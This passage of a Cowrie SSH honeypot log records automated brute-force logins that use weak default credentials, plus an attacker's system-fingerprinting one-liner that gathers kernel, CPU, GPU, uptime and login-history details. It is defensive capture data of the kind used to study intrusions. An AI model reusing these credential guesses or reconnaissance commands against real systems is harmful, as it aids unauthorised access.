{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:50.156078Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:54:50.156698Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:54:50.247793Z","src_ip":"212.227.125.160","session":"3abc43dc301e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:54:51.030328Z","src_ip":"212.227.125.160","session":"3abc43dc301e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.031096Z","src_ip":"212.227.125.160","session":"3abc43dc301e"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.084261Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.094414Z","src_ip":"212.227.125.160","session":"3abc43dc301e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.095606Z","src_ip":"212.227.125.160","session":"3abc43dc301e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:54:51.725014Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.725709Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.726619Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.727964Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.729169Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.729980Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.730789Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.732098Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.732780Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.733404Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.733963Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.734717Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:54:51.735266Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:54:52.004946Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:52.005850Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:52.006727Z","src_ip":"212.227.125.160","session":"ac8013e467d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55188,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e24789cdcc2","protocol":"ssh","message":"New connection: 212.227.125.160:55188 (1.2.3.4:22) [session: 3e24789cdcc2]","sensor":"my-vps","timestamp":"2025-08-26T11:54:56.030943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:56.032017Z","src_ip":"212.227.125.160","session":"3e24789cdcc2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:54:56.090911Z","src_ip":"212.227.125.160","session":"3e24789cdcc2"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:56.315178Z","src_ip":"212.227.125.160","session":"3e24789cdcc2"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38228,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b0c3b44e164","protocol":"ssh","message":"New connection: 196.251.86.249:38228 (1.2.3.4:22) [session: 3b0c3b44e164]","sensor":"my-vps","timestamp":"2025-08-26T11:54:56.476758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:54:57.057451Z","src_ip":"196.251.86.249","session":"3b0c3b44e164"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:54:57.060112Z","src_ip":"196.251.86.249","session":"3b0c3b44e164"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:54:57.382891Z","src_ip":"212.227.125.160","session":"3e24789cdcc2"}
{"eventid":"cowrie.login.failed","username":"git","password":"qwerty123456","message":"login attempt [git/qwerty123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:54:59.497831Z","src_ip":"196.251.86.249","session":"3b0c3b44e164"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:00.907111Z","src_ip":"196.251.86.249","session":"3b0c3b44e164"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55960,"dst_ip":"1.2.3.4","dst_port":22,"session":"456a943f1492","protocol":"ssh","message":"New connection: 212.227.125.160:55960 (1.2.3.4:22) [session: 456a943f1492]","sensor":"my-vps","timestamp":"2025-08-26T11:55:00.960398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:00.965385Z","src_ip":"212.227.125.160","session":"456a943f1492"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:01.019415Z","src_ip":"212.227.125.160","session":"456a943f1492"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56932,"dst_ip":"1.2.3.4","dst_port":22,"session":"aebeba54d049","protocol":"ssh","message":"New connection: 83.168.105.65:56932 (1.2.3.4:22) [session: aebeba54d049]","sensor":"my-vps","timestamp":"2025-08-26T11:55:01.033450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:01.034300Z","src_ip":"83.168.105.65","session":"aebeba54d049"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:01.072613Z","src_ip":"83.168.105.65","session":"aebeba54d049"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:01.186423Z","src_ip":"83.168.105.65","session":"aebeba54d049"}
{"eventid":"cowrie.login.failed","username":"polkitd","password":"polkitd","message":"login attempt [polkitd/polkitd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:01.267018Z","src_ip":"212.227.125.160","session":"456a943f1492"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:02.225666Z","src_ip":"83.168.105.65","session":"aebeba54d049"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:02.359273Z","src_ip":"212.227.125.160","session":"456a943f1492"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56728,"dst_ip":"1.2.3.4","dst_port":22,"session":"99c45545eab9","protocol":"ssh","message":"New connection: 212.227.125.160:56728 (1.2.3.4:22) [session: 99c45545eab9]","sensor":"my-vps","timestamp":"2025-08-26T11:55:07.165340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:07.166717Z","src_ip":"212.227.125.160","session":"99c45545eab9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:55:07.217844Z","src_ip":"212.227.125.160","session":"99c45545eab9"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-26T11:55:07.740288Z","src_ip":"212.227.125.160","session":"99c45545eab9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:55:08.792576Z","src_ip":"212.227.125.160","session":"99c45545eab9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57494,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7a793ed5c35","protocol":"ssh","message":"New connection: 212.227.125.160:57494 (1.2.3.4:22) [session: a7a793ed5c35]","sensor":"my-vps","timestamp":"2025-08-26T11:55:12.811050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:55:12.811972Z","src_ip":"212.227.125.160","session":"a7a793ed5c35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 